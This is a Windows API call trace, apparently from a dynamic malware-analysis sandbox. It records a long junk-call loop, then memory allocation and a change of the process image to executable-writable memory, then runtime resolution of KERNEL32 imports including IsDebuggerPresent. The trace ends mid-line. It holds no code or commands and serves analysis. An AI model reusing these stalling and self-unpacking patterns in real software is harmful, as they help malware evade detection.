0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.311] AddAtomA (lpString=0x0) returned 0x0 [0044.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.312] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.312] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.312] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.313] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.313] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.313] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.314] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.314] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.314] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.315] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.315] AddAtomA (lpString=0x0) returned 0x0 [0044.315] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.316] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.316] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.316] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.317] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.317] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.317] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.318] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.318] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.318] AddAtomA (lpString=0x0) returned 0x0 [0044.319] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.319] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.319] AddAtomA (lpString=0x0) returned 0x0 [0044.319] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.319] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.319] AddAtomA (lpString=0x0) returned 0x0 [0044.319] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.319] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.416] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0044.416] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0044.416] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0044.416] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0044.416] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0044.416] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0044.416] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0044.417] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0044.417] SetErrorMode (uMode=0x400) returned 0x0 [0044.417] SetErrorMode (uMode=0x0) returned 0x400 [0044.417] GetVersionExA (in: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0044.417] VirtualAlloc (lpAddress=0x0, dwSize=0x2d800, flAllocationType=0x1000, flProtect=0x4) returned 0x2b0000 [0044.420] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5f0 | out: lpflOldProtect=0x18f5f0*=0x2) returned 1 [0044.447] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.448] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0044.448] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0044.448] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSize") returned 0x76c3196e [0044.448] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointer") returned 0x76c317d1 [0044.448] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0044.448] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0044.449] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeSListHead") returned 0x771694a4 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0044.450] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0044.548] GetProcAddress 